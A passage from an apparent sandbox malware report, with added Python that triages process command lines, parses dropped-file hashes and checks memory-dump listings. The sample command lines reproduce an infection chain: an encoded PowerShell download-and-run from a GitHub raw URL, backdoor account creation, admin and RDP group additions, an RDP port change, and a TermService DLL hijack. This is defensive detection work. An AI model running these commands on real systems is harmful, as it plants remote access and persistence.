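    "LgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcA"
    "aQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMA"
    "cQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA"
)

# Constructed sample input: command lines copied from the process tree above
# (argv[0] added to the first one, which the report logs without it).
SAMPLE_CMDLINES = [
    r'powershell.exe -ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps1',
    r'"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll',
    r'"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"',
    r'"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f',
    r'"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f',
    r'"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add',
    r'net.exe user wgautilacc wHLGRkc2 /add',
    r'net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD',
    r'net user wgautilacc 1234',
    r'wmic CPU get NAME',
    "powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc " + ENC_B64,
]

# -e/-ec/-en/-enc/-encodedcommand are the abbreviations PowerShell accepts for
# -EncodedCommand; "-ep bypass" (-ExecutionPolicy) must not match here.
ENC_RE = re.compile(r'\s-e(?:c|n|nc|ncodedcommand)\s+([A-Za-z0-9+/=]+)', re.I)
PORT_RE = re.compile(r'/v\s+PortNumber\s+/t\s+REG_DWORD\s+/d\s+(\S+)', re.I)
NET = r'\bnet(?:1|\.exe)?"?\s+'      # net, net1, net.exe, "...\net.exe"
REG = r'\breg(?:\.exe)?"?\s+add\s'   # reg add / "...\reg.exe" ADD

# Rule names are this example's own; each regex describes one step seen above.
RULES = [
    ("powershell_encoded_command",
     re.compile(r'powershell.*\s-e(?:c|n|nc|ncodedcommand)\s+[A-Za-z0-9+/=]{16,}', re.I)),
    ("powershell_execution_policy_bypass",
     re.compile(r'powershell.*\s-e(?:p|x|xec|xecutionpolicy)\s+bypass\b', re.I)),
    ("termservice_servicedll_redirect",
     re.compile(REG + r'.*services\\TermService\\parameters\b.*\bServiceDLL\b', re.I)),
    ("rdp_listener_port_change",
     re.compile(REG + r'.*WinStations\\RDP-Tcp\b.*\bPortNumber\b', re.I)),
    ("local_admin_group_add",
     re.compile(NET + r'localgroup\s+"?administrators"?\s.*\s/add\b', re.I)),
    ("rdp_users_group_add",
     re.compile(NET + r'localgroup\s+"remote desktop users"\s.*\s/add\b', re.I)),
    ("local_user_create",
     re.compile(NET + r'user\s+\S+\s+\S+\s+/add\b', re.I)),
    ("local_user_password_set",          # "net user <name> <password>" with no switch
     re.compile(NET + r'user\s+\S+\s+[^/\s]+\s*$', re.I)),
    ("dll_owner_or_acl_change",          # takeown/icacls aimed at a .dll
     re.compile(r'\b(?:takeown|icacls)(?:\.exe)?"?\s.*\S+\.dll\b', re.I)),
]


def decode_encoded_command(cmdline):
    """Return the script behind a PowerShell -enc argument (base64 of UTF-16LE
    text), or None if the command line carries none or it does not decode."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    b64 = m.group(1)
    b64 += "=" * (-len(b64) % 4)  # tolerate stripped padding
    try:
        return base64.b64decode(b64).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def rdp_port_from_cmdline(cmdline):
    """Return the listener port a 'reg add ... PortNumber' command sets, or
    None. reg.exe accepts hex, so the 0x1C21 in this report is TCP 7201."""
    m = PORT_RE.search(cmdline)
    if not m:
        return None
    try:
        return int(m.group(1), 0)
    except ValueError:
        return None


def triage_cmdline(cmdline):
    """Names of the rules that fire on one command line, in RULES order."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def triage(cmdlines):
    """Map each command line that fires at least one rule to its rule names."""
    hits = {}
    for cmd in cmdlines:
        names = triage_cmdline(cmd)
        if names:
            hits[cmd] = names
    return hits


if __name__ == "__main__":
    for cmd, names in triage(SAMPLE_CMDLINES).items():
        print(", ".join(names), "<-", cmd[:90])
    print("decoded -enc:", decode_encoded_command(SAMPLE_CMDLINES[-1]))
    print("new RDP port:", rdp_port_from_cmdline(SAMPLE_CMDLINES[3]))
```

The rules key on the exact switches the tree shows rather than on process names alone, because every binary involved (reg.exe, net.exe, icacls.exe, takeown.exe, powershell.exe) is legitimate and common; on a real host the same logic would be run over Sysmon event 1 or Security 4688 command lines, and the decoded -enc text is what to compare against the Malware Config URL.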
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RES7149.tmpMD5
ec9c9954a08490fcf25d0410a60bf12f
SHA13040027fc18fc7d4c19c3986b6a7fb27963428d2
SHA256f9f6a2f24d18b51a52f871efaf9907140976a9fecb4483dd86792874569cdc10
SHA51263ca3b23a63524b9e14dbbc7d850a47634d0dbf53b1260c30b977de742042b810292c9895bc3bc3e067b6245de9dea30b87b899cf74c62dffdbbb96485e1d108
-
C:\Users\Admin\AppData\Local\Temp\get-points.ps1MD5
bcac3bbb18f093dbc8e5e76d2675695f
SHA196453f65b41e428937349e6f48fe67d6dfd6a580
SHA256b25768626991b9a33e3ada79e3beb92fa5d83e1b50f2820e6fa2d6cf4827b21a
SHA51278c55502c7d0484b458fadb78bc075b8eda01b794e2037283df11dc58105bd632c0e747e92fd7aac7b79c5ac0ddce9bb2c6e7ce158c743c9f080a52eda0498ab
-
C:\Users\Admin\AppData\Local\Temp\get-points.zipMD5
42c2a160d2d191e6ffcc1076b4734ee2
SHA1c8a71ddb77c6bad039fbb041bbf7ea2021ca9d49
SHA2562b8aebe68161f07e7029bac05eeeb009455553731baf60b447d0d4aaa9fded99
SHA5123b9de3ad6cbe4db3958564b4bd37a45e6aa3a62a4a6e6756d6e997a9cc9c2dca31053e9e0aa300c1660b72332eb1f677f6b65762825ac68a99a55d06043e0939
-
C:\Users\Admin\AppData\Local\Temp\niy0jjqs\niy0jjqs.dllMD5
9677a5b063bfa78ab109c8c5ddd13177
SHA10472c21031c110dbdc606299592f671c577f3ffb
SHA256adc62fb603910972deb6c22bee0a16d08626e1883e6a7b6529d58050796d9c17
SHA512fe966160c0d73d158097c0c0fee842d7a8f3dfcb09ff9c2babd42415ae2e50824937623ca6e1af8c1c56f89910f06ce0b0c5bee2f267a8435434dc3d1b6d6683
-
C:\Windows\system32\rfxvmt.dllMD5
dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
\??\PIPE\lsarpcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\lsarpcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\samrMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\samr
MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\c:\Users\Admin\AppData\Local\Temp\niy0jjqs\CSC2F104AD658C14F50B898825C301F8E4D.TMP
MD5 b41801b370b1537c73680a8c8f6c230a
SHA1 77ad061d62a4fa4b01d43b65c0c08be0e9e0a91c
SHA256 563acaa2adb416491065a99978821e809b308d0e52181ee112ea932ae550e9ea
SHA512 c2b6e4011c98adcdbd63a9df7c6231a8f81a4e2b07ab31d5517937a8faf7b21a7aa71df474f2867f421f442de402e210e818b14dc17c6bde90065a8ed517df87
-
\??\c:\Users\Admin\AppData\Local\Temp\niy0jjqs\niy0jjqs.0.cs
MD5 6f235215132cdebacd0f793fe970d0e3
SHA1 2841e44c387ed3b6f293611992f1508fe9b55b89
SHA256 ccad602538354ee5bbc78ab935207c36ba9910da1a7b5a10ff455e34e15f15ec
SHA512 a14657bc5be862a96c1826347b551e07b47ffa6ffd7e12fbfc3437b9a48e8b8e020ae71b8ef836c357d9db6c065da962a6141272d9bc58b76a9eb9c11553d44e
-
\??\c:\Users\Admin\AppData\Local\Temp\niy0jjqs\niy0jjqs.cmdline
MD5 2e4936ddc36f3626faac240f0b9d32cd
SHA1 468219dba02cd2a98545172f6d3691e291fab533
SHA256 37eac7f8a3e45d12d064cf47b3b25ebdc5f1a98902522b0bb13d80782c4febde
SHA512 bde5e721490986627124fb4be8018479745f78fd9d30004e6787d6cce0060ce53dc6ea1c402d3fad9832fbb8a5fc971ca69ccf8e32e6524e30490ffa44c0dccc
-
\Windows\Branding\mediasrv.png
MD5 f357d4e7b83bc0a41c65d97f3e6f50f4
SHA1 71db3180a8ada6d5d7722c54a5940c3490f78636
SHA256 db0b525a0871cd413d9e1e4a31568b10344aa996823a22e85179ea4dab11afba
SHA512 566bc45578f2754b4330fc2721d24aef95ae25ef258d56b00c8cb585061f89386a5d27245d301ea0d479797a42f0487605c294008a6d33559634b5e35f4b4e8e
-
\Windows\Branding\mediasvc.png
MD5 d5de6f599d9807bac2f5a8e751a8c38f
SHA1 9e70edf56b6a5768fda84232e9c557e750d3631b
SHA256 18207938b456352ad540ed62fb113b7b11025a6d2b1de08728772c24c8553fca
SHA512 e526e3a75be31762bb5fc01f4450ff48391fe36a1e71aef6a89d3f262e523e2f7654501f43667a3e982a05835418e72ae26ec3ba955b8537a700e69e82337fc5
-
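The dropped-files listing above is the sandbox's hash table with its column labels run into the values. Before these digests go into a hash set or a detection rule, two things need handling: the report lists one row per handle, so the same object can appear more than once, and the \??\PIPE\lsarpc and \??\PIPE\samr rows carry the digests of zero-length input (there is no file content behind a named-pipe handle), so they are not usable indicators. The following Python is an added example, not part of the report or of any sandbox tooling: it parses the flattened layout as it appears above (path fused with the MD5 label, one digest per line, records separated by "-"), validates digest lengths, de-duplicates, and filters out the empty and named-pipe entries. The sample input is four records copied from the listing; the layout rules are inferred from the text, not documented by the report.

```python
import hashlib
import re
from dataclasses import dataclass, field

# Constructed sample input: four records copied from the dropped-files listing
# in the report, in the flattened form the extraction produced (label fused to
# the path or to the digest). The lsarpc record is repeated, as it is above.
SAMPLE = r"""
C:\Users\Admin\AppData\Local\Temp\get-points.zipMD5
42c2a160d2d191e6ffcc1076b4734ee2
SHA1c8a71ddb77c6bad039fbb041bbf7ea2021ca9d49
SHA2562b8aebe68161f07e7029bac05eeeb009455553731baf60b447d0d4aaa9fded99
SHA5123b9de3ad6cbe4db3958564b4bd37a45e6aa3a62a4a6e6756d6e997a9cc9c2dca31053e9e0aa300c1660b72332eb1f677f6b65762825ac68a99a55d06043e0939
-
\??\PIPE\lsarpcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\lsarpcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\Windows\Branding\mediasrv.pngMD5
f357d4e7b83bc0a41c65d97f3e6f50f4
SHA171db3180a8ada6d5d7722c54a5940c3490f78636
SHA256db0b525a0871cd413d9e1e4a31568b10344aa996823a22e85179ea4dab11afba
SHA512566bc45578f2754b4330fc2721d24aef95ae25ef258d56b00c8cb585061f89386a5d27245d301ea0d479797a42f0487605c294008a6d33559634b5e35f4b4e8e
-
"""

DIGEST_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
# Splits a fused line such as "SHA1c8a7..." into its label and hex value.
DIGEST_RE = re.compile(r"^(SHA512|SHA256|SHA1)([0-9a-fA-F]+)$")
HEX_RE = re.compile(r"^[0-9a-f]+$")
# Digests of zero-length input: rows carrying these describe no file content.
EMPTY_DIGESTS = {
    "MD5": hashlib.md5(b"").hexdigest(),
    "SHA1": hashlib.sha1(b"").hexdigest(),
    "SHA256": hashlib.sha256(b"").hexdigest(),
    "SHA512": hashlib.sha512(b"").hexdigest(),
}


@dataclass
class DroppedFile:
    path: str
    hashes: dict = field(default_factory=dict)

    @property
    def is_empty(self) -> bool:
        """True when every digest is the digest of empty input."""
        return all(self.hashes.get(k) == v for k, v in EMPTY_DIGESTS.items())

    @property
    def is_named_pipe(self) -> bool:
        return self.path.upper().startswith("\\??\\PIPE\\")


def _check_hex(algo: str, value: str) -> str:
    value = value.lower()
    if not HEX_RE.match(value) or len(value) != DIGEST_LEN[algo]:
        raise ValueError(f"bad {algo} digest: {value!r}")
    return value


def parse_listing(text: str) -> list[DroppedFile]:
    """Layout assumed (inferred from the report text): '<path>MD5', the MD5 on
    its own line, one fused line per remaining digest, then a '-' separator."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    records: list[DroppedFile] = []
    current = None
    i = 0
    while i < len(lines):
        ln = lines[i]
        if ln == "-":
            if current is not None:
                records.append(current)
                current = None
            i += 1
            continue
        if current is None:
            if not ln.endswith("MD5") or i + 1 >= len(lines):
                raise ValueError(f"expected '<path>MD5' at line {i}: {ln!r}")
            current = DroppedFile(ln[:-3], {"MD5": _check_hex("MD5", lines[i + 1])})
            i += 2
            continue
        m = DIGEST_RE.match(ln)
        if not m:
            raise ValueError(f"expected digest line at {i}: {ln!r}")
        current.hashes[m.group(1)] = _check_hex(m.group(1), m.group(2))
        i += 1
    if current is not None:
        records.append(current)
    return records


def dedupe(records: list[DroppedFile]) -> list[DroppedFile]:
    """Drop repeated rows: the report lists one row per handle, so the same
    object can appear several times."""
    seen, out = set(), []
    for r in records:
        key = (r.path.lower(), r.hashes.get("SHA256"))
        if key not in seen:
            seen.add(key)
            out.append(r)
    return out


def indicators(records: list[DroppedFile]) -> list[tuple[str, str]]:
    """(path, SHA256) pairs worth carrying into a hash set: real file content
    only, so named-pipe handles and empty-input digests are excluded."""
    return [(r.path, r.hashes["SHA256"]) for r in dedupe(records)
            if not r.is_empty and not r.is_named_pipe]


if __name__ == "__main__":
    for path, sha256 in indicators(parse_listing(SAMPLE)):
        print(f"{sha256}  {path}")
```

Run as a script it prints the two usable (SHA256, path) pairs from the sample; the two lsarpc rows collapse to one and are then dropped because every digest matches the empty-input value. The same check is worth applying to any sandbox export before the hashes are shared, since empty-input digests in a blocklist match every zero-byte file on a host.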
memory/348-40-0x0000000000000000-mapping.dmp
-
memory/368-48-0x0000000000000000-mapping.dmp
-
memory/368-67-0x0000000000000000-mapping.dmp
-
memory/372-57-0x0000000000000000-mapping.dmp
-
memory/568-47-0x0000000000000000-mapping.dmp
-
memory/628-55-0x0000000000000000-mapping.dmp
-
memory/676-10-0x0000000000000000-mapping.dmp
-
memory/684-0-0x0000000002220000-0x000000000255D000-memory.dmp
Filesize 3.2MB
-
memory/684-65-0x0000000000000000-mapping.dmp
-
memory/684-1-0x0000000002560000-0x0000000002571000-memory.dmp
Filesize 68KB
-
memory/684-45-0x0000000000000000-mapping.dmp
-
memory/804-71-0x0000000000000000-mapping.dmp
-
memory/824-70-0x0000000000000000-mapping.dmp
-
memory/848-46-0x0000000000000000-mapping.dmp
-
memory/860-13-0x0000000000000000-mapping.dmp
-
memory/884-117-0x0000000000000000-mapping.dmp
-
memory/1072-54-0x0000000000000000-mapping.dmp
-
memory/1104-64-0x0000000000000000-mapping.dmp
-
memory/1104-44-0x0000000000000000-mapping.dmp
-
memory/1152-76-0x0000000000000000-mapping.dmp
-
memory/1300-34-0x0000000002080000-0x0000000002081000-memory.dmp
Filesize 4KB
-
memory/1300-2-0x0000000000000000-mapping.dmp
-
memory/1300-4-0x0000000002570000-0x0000000002571000-memory.dmp
Filesize 4KB
-
memory/1300-3-0x000007FEF51D0000-0x000007FEF5BBC000-memory.dmp
Filesize 9.9MB
-
memory/1300-5-0x000000001ACD0000-0x000000001ACD1000-memory.dmp
Filesize 4KB
-
memory/1300-6-0x00000000020B0000-0x00000000020B1000-memory.dmp
Filesize 4KB
-
memory/1300-7-0x00000000024C0000-0x00000000024C1000-memory.dmp
Filesize 4KB
-
memory/1300-9-0x000000001C1C0000-0x000000001C1C1000-memory.dmp
Filesize 4KB
-
memory/1300-17-0x0000000001F20000-0x0000000001F21000-memory.dmp
Filesize 4KB
-
memory/1300-18-0x000000001AA90000-0x000000001AA91000-memory.dmp
Filesize 4KB
-
memory/1300-21-0x000000001B580000-0x000000001B581000-memory.dmp
Filesize 4KB
-
memory/1300-33-0x0000000002070000-0x0000000002071000-memory.dmp
Filesize 4KB
-
memory/1300-35-0x0000000024610000-0x0000000024611000-memory.dmp
Filesize 4KB
-
memory/1332-83-0x000007FEF51D0000-0x000007FEF5BBC000-memory.dmp
Filesize 9.9MB
-
memory/1332-98-0x0000000000EA0000-0x0000000000EA1000-memory.dmp
Filesize 4KB
-
memory/1332-86-0x0000000000990000-0x0000000000991000-memory.dmp
Filesize 4KB
-
memory/1332-115-0x000000001AB20000-0x000000001AB21000-memory.dmp
Filesize 4KB
-
memory/1332-114-0x0000000019430000-0x0000000019431000-memory.dmp
Filesize 4KB
-
memory/1332-107-0x000000001AA90000-0x000000001AA91000-memory.dmp
Filesize 4KB
-
memory/1332-106-0x0000000019FB0000-0x0000000019FB1000-memory.dmp
Filesize 4KB
-
memory/1332-99-0x00000000011A0000-0x00000000011A1000-memory.dmp
Filesize 4KB
-
memory/1332-87-0x0000000000A80000-0x0000000000A81000-memory.dmp
Filesize 4KB
-
memory/1332-82-0x0000000000000000-mapping.dmp
-
memory/1332-97-0x0000000000FB0000-0x0000000000FB1000-memory.dmp
Filesize 4KB
-
memory/1332-90-0x0000000001160000-0x0000000001161000-memory.dmp
Filesize 4KB
-
memory/1332-96-0x0000000000E90000-0x0000000000E91000-memory.dmp
Filesize 4KB
-
memory/1332-95-0x0000000000E80000-0x0000000000E81000-memory.dmp
Filesize 4KB
-
memory/1360-43-0x0000000000000000-mapping.dmp
-
memory/1504-53-0x0000000000000000-mapping.dmp
-
memory/1512-77-0x0000000000000000-mapping.dmp
-
memory/1528-56-0x0000000000000000-mapping.dmp
-
memory/1616-116-0x0000000000000000-mapping.dmp
-
memory/1620-49-0x0000000000000000-mapping.dmp
-
memory/1640-41-0x0000000000000000-mapping.dmp
-
memory/1640-63-0x0000000000000000-mapping.dmp
-
memory/1660-72-0x0000000000000000-mapping.dmp
-
memory/1664-60-0x0000000000000000-mapping.dmp
-
memory/1664-36-0x0000000000000000-mapping.dmp
-
memory/1668-61-0x0000000000000000-mapping.dmp
-
memory/1668-73-0x0000000000000000-mapping.dmp
-
memory/1668-38-0x0000000000000000-mapping.dmp
-
memory/1716-80-0x0000000000000000-mapping.dmp
-
memory/1720-66-0x0000000000000000-mapping.dmp
-
memory/1736-62-0x0000000000000000-mapping.dmp
-
memory/1740-42-0x0000000000000000-mapping.dmp
-
memory/1748-79-0x0000000000000000-mapping.dmp
-
memory/1844-39-0x0000000000000000-mapping.dmp
-
memory/1908-81-0x0000000000000000-mapping.dmp
-
memory/1908-50-0x0000000000000000-mapping.dmp
-
memory/2016-52-0x0000000000000000-mapping.dmp
-
memory/2036-51-0x0000000000000000-mapping.dmp
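The memory-dump names above encode the PID, a sequence number and, for region dumps, the virtual address range that was captured; the "-mapping.dmp" entries carry a zero base and no range or size. The Filesize given for each region dump is simply end minus base, which makes the listing self-checking and lets the same address range be spotted across processes (the 9.9MB region at 0x000007FEF51D0000 appears under both PID 1300 and PID 1332). The following Python is an added example, not part of the report or of any sandbox tooling: it parses the file names as they appear above, recomputes each size from the address range, reports any disagreement with the listed Filesize, and groups identical ranges by PID. The sample input is six entries copied from the listing; the name layout and the size-rounding convention (binary units, one decimal for MB) are inferred from the listed values, not documented by the report.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample input: six entries copied from the memory-dump listing in
# the report, in the flattened form the extraction produced ("Filesize" fused
# to the file name, the value on the next line).
SAMPLE = """
memory/684-0-0x0000000002220000-0x000000000255D000-memory.dmpFilesize
3.2MB
-
memory/684-65-0x0000000000000000-mapping.dmp
-
memory/684-1-0x0000000002560000-0x0000000002571000-memory.dmpFilesize
68KB
-
memory/1300-3-0x000007FEF51D0000-0x000007FEF5BBC000-memory.dmpFilesize
9.9MB
-
memory/1300-4-0x0000000002570000-0x0000000002571000-memory.dmpFilesize
4KB
-
memory/1332-83-0x000007FEF51D0000-0x000007FEF5BBC000-memory.dmpFilesize
9.9MB
-
"""

# File-name layout assumed from the listing:
#   memory/<pid>-<seq>-0x<base>-0x<end>-memory.dmp   (a dumped region)
#   memory/<pid>-<seq>-0x<base>-mapping.dmp          (no range, no size)
NAME_RE = re.compile(
    r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)(?:-0x([0-9A-Fa-f]+))?-(memory|mapping)\.dmp(Filesize)?$"
)


@dataclass
class Dump:
    pid: int
    seq: int
    base: int
    end: Optional[int]
    kind: str
    listed_size: Optional[str]

    @property
    def size(self) -> Optional[int]:
        return None if self.end is None else self.end - self.base


def format_size(nbytes: int) -> str:
    """Render a byte count the way the listing does (assumption: binary units,
    one decimal place for MB, a whole number for KB)."""
    if nbytes >= 1 << 20:
        return f"{nbytes / (1 << 20):.1f}MB"
    return f"{nbytes / (1 << 10):g}KB"


def parse_dumps(text: str) -> list[Dump]:
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    dumps: list[Dump] = []
    i = 0
    while i < len(lines):
        ln = lines[i]
        i += 1
        if ln == "-":
            continue
        m = NAME_RE.match(ln)
        if not m:
            raise ValueError(f"unrecognised entry: {ln!r}")
        pid, seq, base, end, kind, has_size = m.groups()
        listed = None
        if has_size:
            if i >= len(lines):
                raise ValueError(f"missing size after {ln!r}")
            listed = lines[i]
            i += 1
        dumps.append(Dump(int(pid), int(seq), int(base, 16),
                          int(end, 16) if end else None, kind, listed))
    return dumps


def mismatches(dumps: list[Dump]) -> list[Dump]:
    """Entries whose listed Filesize disagrees with end - base."""
    return [d for d in dumps
            if d.size is not None and d.listed_size is not None
            and format_size(d.size) != d.listed_size]


def shared_regions(dumps: list[Dump]) -> dict[tuple[int, int], list[int]]:
    """Address ranges dumped from more than one process. An identical range in
    two PIDs usually means the same image mapped at its preferred base; that is
    an interpretation, not something the listing states."""
    by_range: dict[tuple[int, int], set[int]] = {}
    for d in dumps:
        if d.end is not None:
            by_range.setdefault((d.base, d.end), set()).add(d.pid)
    return {k: sorted(v) for k, v in by_range.items() if len(v) > 1}


def largest_per_pid(dumps: list[Dump]) -> dict[int, Dump]:
    """The biggest captured region of each process, the usual first thing to
    open when triaging the dumps."""
    out: dict[int, Dump] = {}
    for d in dumps:
        if d.size is not None and (d.pid not in out or d.size > out[d.pid].size):
            out[d.pid] = d
    return out


if __name__ == "__main__":
    dumps = parse_dumps(SAMPLE)
    for d in dumps:
        if d.size is not None:
            print(f"pid {d.pid:>5} seq {d.seq:>3} {d.base:#018x}-{d.end:#018x} "
                  f"{format_size(d.size):>6} (listed {d.listed_size})")
    print("mismatches:", mismatches(dumps))
    print("shared:", shared_regions(dumps))
```

For the sample every recomputed size agrees with the listed one, and the only range shared between processes is 0x000007FEF51D0000-0x000007FEF5BBC000 in PIDs 1300 and 1332. Re-checking the sizes is cheap and catches a mangled address range early, before effort goes into the wrong dump.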